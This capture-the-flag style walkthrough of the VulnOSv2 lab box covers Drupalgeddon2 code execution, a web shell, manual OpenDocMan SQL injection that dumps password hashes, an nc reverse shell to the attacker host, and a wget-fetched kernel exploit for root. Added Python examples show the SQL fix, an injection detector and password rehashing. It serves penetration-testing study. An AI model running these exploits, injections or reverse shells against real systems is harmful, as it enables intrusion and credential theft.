Preface
OSCP preparation, OSCP series: the VulnOSv2 box, two ways to obtain a low-privilege shell
Difficulty: easy
- Low-privilege shell: Drupal 7 getshell vulnerability, OpenDocMan SQL injection, SSH login
- Privilege escalation: kernel exploit
Download:
https://www.vulnhub.com/entry/vulnos-2,147/
nmap
Host discovery
└─# nmap -sn 192.168.88.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 21:21 CST
Nmap scan report for 192.168.88.1 (192.168.88.1)
Host is up (0.00083s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.88.2 (192.168.88.2)
Host is up (0.00024s latency).
MAC Address: 00:50:56:F2:C6:98 (VMware)
Nmap scan report for 192.168.88.191 (192.168.88.191)
Host is up (0.00020s latency).
MAC Address: 00:0C:29:9E:4C:73 (VMware)
Nmap scan report for 192.168.88.254 (192.168.88.254)
Host is up (0.00027s latency).
MAC Address: 00:50:56:FD:D2:B0 (VMware)
Nmap scan report for 192.168.88.189 (192.168.88.189)
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.95 seconds
Port scan
└─# nmap --min-rate 10000 -p- 192.168.88.191
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 21:22 CST
Nmap scan report for 192.168.88.191 (192.168.88.191)
Host is up (0.00070s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6667/tcp open irc
MAC Address: 00:0C:29:9E:4C:73 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 50.69 seconds
Detailed port scan
└─# nmap -sV -sT -sC -O -p22,80,6667 192.168.88.191
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 21:25 CST
Nmap scan report for 192.168.88.191 (192.168.88.191)
Host is up (0.00060s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
| 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
|_ 256 71:bc:6b:7b:56:02:a4:8e:ce:1c:8e:a6:1e:3a:37:94 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-title: VulnOSv2
|_http-server-header: Apache/2.4.7 (Ubuntu)
6667/tcp open irc ngircd
MAC Address: 00:0C:29:9E:4C:73 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.93 seconds
Information gathering
nmap turned up nothing of use, so take a look at the web page.
Following the hint on the page, click through; the site's CMS turns out to be Drupal 7.
└─$ whatweb http://192.168.88.191/jabc/
http://192.168.88.191/jabc/ [200 OK] Apache[2.4.7], Content-Language[en], Country[RESERVED][ZZ], Drupal, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[192.168.88.191], JQuery, MetaGenerator[Drupal 7 (http://drupal.org)], PHP[5.5.9-1ubuntu4.14], Script[text/javascript], Title[JABC | Just Another Bioware Company], UncommonHeaders[x-generator], X-Powered-By[PHP/5.5.9-1ubuntu4.14]
Exploitation
Getting a shell directly: Drupal 7 getshell
Searching for Drupal 7 exploits finds a matching one; try it.
└─$ searchsploit -p 44449
Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution
URL: https://www.exploit-db.com/exploits/44449
Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb
Codes: CVE-2018-7600
Verified: True
File Type: Ruby script, ASCII text
┌──(kali㉿192)-[~/桌面/测试]
└─$ cp /usr/share/exploitdb/exploits/php/webapps/44449.rb 44449.rb
Running the script produces an error.
A search shows that a Ruby gem has to be installed first:
sudo gem install highline
Then run it directly:
└─$ ruby 44449.rb http://192.168.88.191/jabc/
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://192.168.88.191/jabc/
--------------------------------------------------------------------------------
[!] MISSING: http://192.168.88.191/jabc/CHANGELOG.txt (HTTP Response: 404)
[!] MISSING: http://192.168.88.191/jabc/core/CHANGELOG.txt (HTTP Response: 404)
[+] Found : http://192.168.88.191/jabc/includes/bootstrap.inc (HTTP Response: 200)
[!] WARNING: Could be a false-positive [1-1], as the file could be reported to be missing
[!] MISSING: http://192.168.88.191/jabc/includes/bootstrap.inc (HTTP Response: 200)
[!] MISSING: http://192.168.88.191/jabc/core/includes/bootstrap.inc (HTTP Response: 404)
[!] MISSING: http://192.168.88.191/jabc/includes/database.inc (HTTP Response: 404)
[+] Found : http://192.168.88.191/jabc/ (HTTP Response: 200)
[+] Metatag: v7.x [Generator]
[!] MISSING: http://192.168.88.191/jabc/ (HTTP Response: 200)
[+] Drupal?: v7.x
--------------------------------------------------------------------------------
[*] Testing: Form (user/password)
[+] Result : Form valid
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Clean URLs
[!] Result : Clean URLs disabled (HTTP Response: 404)
[i] Isn't an issue for Drupal v7.x
--------------------------------------------------------------------------------
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ZGGUVOYP
[+] Result : ZGGUVOYP
[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!
--------------------------------------------------------------------------------
[*] Testing: Existing file (http://192.168.88.191/jabc/shell.php)
[i] Response: HTTP 404 // Size: 5
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
[*] Testing: Writing To Web Root (./)
[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php
[+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); }
[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!
--------------------------------------------------------------------------------
[i] Fake PHP shell: curl 'http://192.168.88.191/jabc/shell.php' -d 'c=hostname'
VulnOSv2>> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
This gives a shell as the www-data user.
OpenDocMan SQL injection and SSH login
Manual injection
This page appears to contain nothing at all.
Viewing the page source gives a hint:
For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest
Visit the /jabcd0cs/ directory
and log in with guest/guest. The application is OpenDocMan v1.2.7; search for known vulnerabilities.
It has a SQL injection.
The vulnerable URL is:
/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
Because the OSCP+ exam does not allow sqlmap, the injection has to be done by hand.
Enumerate table names
http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,(select(group_concat(table_name))from(infoRmation_schema.tables)where(table_schema)like(database())),3,4,5,6,7,8,9
Result:
odm_access_log,odm_admin,odm_category,odm_data,odm_department,odm_dept_perms,odm_dept_reviewer,odm_filetypes,odm_log,odm_odmsys,odm_rights,odm_settings,odm_udf,odm_user,odm_user_perms
odm_admin turns out to be a dead end, so look at odm_user instead and enumerate its column names. Single quotes are filtered here, so the table name is passed as a hex literal to get around the filter.
http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,(select(group_concat(column_name))from(infoRmation_schema.columns)where(table_schema)like(database())AND(table_name)like(0x6f646d5f75736572)),3,4,5,6,7,8,9
Result:
id,username,password,department,phone,Email,last_name,first_name,pw_reset_code
Retrieve usernames and passwords
http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,(select(group_concat(concat(username,0x2d,password)))from(odm_user)),3,4,5,6,7,8,9
Result:
webmin-b78aae356709f8c31118ea613980954b,guest-084e0343a0486ff05530df6c705c8bb4
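The enumeration above works because add_value is spliced into the query text, and the single-quote filter never fires on a payload that contains no quotes. The block below is an added example (not OpenDocMan's real code; the table contents and the exact query shape are assumptions) that reproduces the weakness against an in-memory SQLite database, shows the parameterized replacement, and adds a small request-log check that flags the table-enumeration URL used on this page.

```python
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for two of the tables enumerated above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE odm_udf (id INTEGER, name TEXT);
        CREATE TABLE odm_user (username TEXT, password TEXT);
        INSERT INTO odm_udf VALUES (1, 'Project');
        INSERT INTO odm_user VALUES ('guest', '084e0343a0486ff05530df6c705c8bb4');
    """)
    return conn


def strip_quotes(value: str) -> str:
    """The only defence the page reports: single quotes are removed."""
    return value.replace("'", "")


def vulnerable_lookup(conn: sqlite3.Connection, add_value: str) -> list:
    """Assumed shape of the weak query: the parameter becomes part of the SQL text.
    A payload such as '1 UNION SELECT username, password FROM odm_user' needs no
    quote at all, so strip_quotes() changes nothing."""
    sql = f"SELECT id, name FROM odm_udf WHERE id = {strip_quotes(add_value)}"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, add_value: str) -> list:
    """Validate the type, then bind the value; the SQL text is a constant."""
    try:
        udf_id = int(add_value)
    except ValueError:
        return []  # a real handler would answer HTTP 400 here
    return conn.execute(
        "SELECT id, name FROM odm_udf WHERE id = ?", (udf_id,)
    ).fetchall()


# Request-log check: decode the query string once and look for UNION ... SELECT
# or information_schema, case-insensitively so infoRmation_schema still matches.
UNION_PATTERN = re.compile(r"\bunion\b.{0,20}\bselect\b|information_schema", re.IGNORECASE)


def looks_like_union_injection(url: str) -> bool:
    return bool(UNION_PATTERN.search(unquote_plus(urlsplit(url).query)))


PAYLOAD = "1 UNION SELECT username, password FROM odm_user"
# Verbatim table-enumeration request from this page, and a constructed benign one.
PAGE_REQUEST = ("http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT 1,"
                "(select(group_concat(table_name))from(infoRmation_schema.tables)"
                "where(table_schema)like(database())),3,4,5,6,7,8,9")
BENIGN_REQUEST = "http://192.168.88.191/jabcd0cs/ajax_udf.php?q=1&add_value=7"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", vulnerable_lookup(db, PAYLOAD))
    print("safe:", safe_lookup(db, PAYLOAD))
    print("flagged:", looks_like_union_injection(PAGE_REQUEST), looks_like_union_injection(BENIGN_REQUEST))
```

The vulnerable function returns the odm_user row alongside the legitimate one, while the parameterized version rejects the same input before any SQL runs. The point of the log check is that a blocklist on a single character is not a control: the request is recognisable by its structure (UNION, information_schema) regardless of how the literals are encoded.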
Cracking the hashes
hash-identifier identifies them as MD5.
Cracking them gives:
webmin/webmin1980
guest/guest
guest login
SSH login
Try SSH with both accounts; the webmin user logs in successfully.
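The hashes came back as bare, unsalted MD5, which is why a lookup recovers them in seconds. As an added example (not the page's or OpenDocMan's code), the block below shows the migration a maintainer would apply: flag rows that look like raw MD5, confirm the password once against the legacy row at login time, and rehash it with salted PBKDF2-HMAC-SHA256 from the standard library. The two rows are the ones returned on this page; the storage format string and the iteration count are my own choices.

```python
import hashlib
import hmac
import os
import re
from typing import Optional

# The two username/hash pairs returned by the injection on this page.
PAGE_ROWS = {
    "webmin": "b78aae356709f8c31118ea613980954b",
    "guest": "084e0343a0486ff05530df6c705c8bb4",
}

LEGACY_MD5 = re.compile(r"^[0-9a-f]{32}$")


def is_legacy_md5(stored: str) -> bool:
    """Flag a stored credential that looks like a bare, unsalted MD5 digest."""
    return bool(LEGACY_MD5.match(stored))


def md5_matches(password: str, stored: str) -> bool:
    """Confirm a password against a legacy row; used only to migrate it."""
    return hmac.compare_digest(hashlib.md5(password.encode()).hexdigest(), stored)


def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 600_000) -> str:
    """Salted PBKDF2-HMAC-SHA256, stored as algorithm$iterations$salt$digest (own convention)."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Constant-time check of a password against a PBKDF2 record."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


def migrate_on_login(username: str, password: str, table: dict) -> bool:
    """Login path: verify a legacy row and, on success, replace it in place."""
    stored = table[username]
    if is_legacy_md5(stored):
        if not md5_matches(password, stored):
            return False
        table[username] = hash_password(password)
        return True
    return verify_password(password, stored)


if __name__ == "__main__":
    users = dict(PAGE_ROWS)
    print("legacy rows:", [u for u, h in users.items() if is_legacy_md5(h)])
    print("guest login:", migrate_on_login("guest", "guest", users))
    print("guest row now:", users["guest"][:40], "...")
```

After one successful login the guest row no longer matches the 32-hex pattern, and later logins go through `verify_password()` instead. The salt means two users with the same password get different records, and the iteration count makes each candidate check cost a measurable fraction of a second rather than the microseconds an MD5 lookup takes.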
ssh webmin@192.168.88.191
ssh guest@192.168.88.191
Privilege escalation
First spawn a reverse shell, because this shell environment is unusable: not even cd /tmp works.
nc 192.168.88.189 6666 -e /bin/sh
Kernel privilege escalation
Linux 3.13
The kernel version is fairly old. Trying Dirty COW first crashed the target outright; luckily a snapshot had been taken beforehand.
A matching exploit was then found.
Try it:
cp /usr/share/exploitdb/exploits/linux/local/37292.c 37292.c
python -m http.server 80
wget http://192.168.88.189/37292.c
gcc 37292.c -o 37292
./37292
Root obtained.